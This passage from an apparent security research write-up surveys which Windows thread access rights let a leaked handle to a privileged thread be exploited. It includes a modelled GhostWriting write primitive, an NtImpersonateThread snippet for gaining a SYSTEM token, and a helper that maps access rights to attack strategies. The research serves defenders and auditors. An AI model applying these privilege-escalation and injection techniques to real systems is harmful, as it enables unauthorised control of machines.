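            return true;              // spinning on jmp $, safe to re-suspend
        if (t.rip != kMovGadget)
            return false;             // lost control of the thread
        t.memory[t.reg1] = t.reg2;    // mov [REG1], REG2
        t.rip = t.memory[t.rsp];      // ret: pop the return address
        t.rsp += 8;
    }
    return false;
}

// Model of the write primitive: set the context, run to the sink.
bool WriteQword(FakeThread& t, uint64_t stackBase, uint64_t what, uint64_t where)
{
    t.reg2 = what;
    t.reg1 = where;
    t.rsp  = stackBase;
    t.rip  = kMovGadget;
    return RunUntilAutoLock(t);
}
```

Calling WriteQword(t, stackBase, kJmpGadget, stackBase) first makes the gadget write its own return address; every later call can then reuse stackBase and write an arbitrary value to an arbitrary address.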
I ported the core function of this technique to x64 to demonstrate its
viability. Instead of using it to execute an entire payload, I simply execute
LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is
available on GitHub[11]. Turning it into something production ready is left as
an exercise for the reader ;)
Additionally, while attending Black Hat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve released a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.
THREAD_DIRECT_IMPERSONATION
This differs from THREAD_IMPERSONATE in that it allows the thread token to be
impersonated, not simply TO impersonate. Exploiting this is simply a matter of
using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7].
Using this we’re able to create a thread totally under our control and
impersonate the privileged one:
hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid);
NtImpersonateThread(hNewThread, hThread, &sqos);
The hNewThread will now be executing with a SYSTEM token, allowing us to do
whatever we need under the privileged impersonation context.
THREAD_IMPERSONATE
Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.
We can use this to force the privileged thread to impersonate us, using the
NtImpersonateThread call, which may unlock additional logic bugs in the
application. For example, if the service creates a shared resource, such as a
file, while impersonating us instead of running as SYSTEM, we can
gain ownership over that file. If multiple privileged threads access it for
information (such as configuration) it could lead to code execution.
THREAD_SET_CONTEXT
While this right grants us access to SetThreadContext, it also conveniently
allows us to use QueueUserAPC. This is effectively granting us a
CreateRemoteThread primitive with a caveat. For an APC to be processed by the
thread, it needs to enter an alertable state. This happens when a specific set
of win32 functions are executed, so it is entirely possible that the thread
never becomes alertable.
If we’re working with an uncooperative thread, SetThreadContext comes in
handy. Using it, we can force the thread to become alertable via the
NtTestAlert function. Of course, we have no ability to call
GetThreadContext and will therefore likely lose control of the thread after
exploitation.
In combination with THREAD_GET_CONTEXT, this right would allow us to
replicate the Ghostwriting code injection technique discussed in the
THREAD_ALL_ACCESS section above.
THREAD_SET_INFORMATION
Needed to set various ThreadInformationClass[9] values on a thread, usually via
NtSetInformationThread. After looking through all of these, I did not
identify any immediate ways in which we could influence the remote thread. Some
of the values are interesting but unusable (ThreadSetTlsArrayAddress,
ThreadAttachContainer, etc.) and are either not implemented/removed or
require SeDebugPrivilege or similar.
I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions.
THREAD_SET_LIMITED_INFORMATION
This allows the caller to set a subset of THREAD_INFORMATION_CLASS values,
namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask,
ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us
anywhere near an exploitable primitive.
THREAD_SET_THREAD_TOKEN
Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic
method of abusing this right. I can set the thread’s token or modify a few
fields (via SetTokenInformation), but this doesn’t grant us much.
Conclusion
I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT
Missing these will require a deeper understanding of your target and some creativity.
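As a quick way to apply the list above to a handle found in the wild, the mapping from granted access to a starting strategy can be written down as a small lookup. This is only a sketch of the conclusions in this post: the bit values are those from winnt.h, SuggestThreadStrategy is a hypothetical helper name, and an empty result simply means none of the generic approaches described here apply.

```cpp
#include <cassert>   // only needed for quick checks of the helper below
#include <cstdint>
#include <string>

// Thread access right values as defined in winnt.h.
constexpr uint32_t kThreadGetContext          = 0x0008;
constexpr uint32_t kThreadSetContext          = 0x0010;
constexpr uint32_t kThreadDirectImpersonation = 0x0200;

// Map a thread handle's granted access to the strategy discussed above.
std::string SuggestThreadStrategy(uint32_t grantedAccess)
{
    // Easiest route, and also what THREAD_ALL_ACCESS boils down to.
    if (grantedAccess & kThreadDirectImpersonation)
        return "NtImpersonateThread";

    if (grantedAccess & kThreadSetContext) {
        // Ghostwriting additionally needs to read the context back.
        if (grantedAccess & kThreadGetContext)
            return "QueueUserAPC or Ghostwriting";
        return "QueueUserAPC";
    }

    return "";  // nothing generic; target-specific creativity required
}
```

A THREAD_ALL_ACCESS mask (0x1fffff on current Windows versions) includes the direct impersonation bit, so it resolves to the NtImpersonateThread route.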
Similarly, processes have a specific subset of rights that are directly exploitable:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE (paired with PROCESS_QUERY_INFORMATION or PROCESS_VM_READ, as described above)
Barring these, more creativity is required.
References
[0] https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1] https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2] https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3] https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4] https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5] https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6] http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7] https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8] https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9] https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10] https://github.com/SafeBreach-Labs/pinjectra
[11] https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12] http://www.hexacorn.com/blog/category/code-injection/
[13] http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14] http://www.nynaeve.net/?p=180
[15] https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98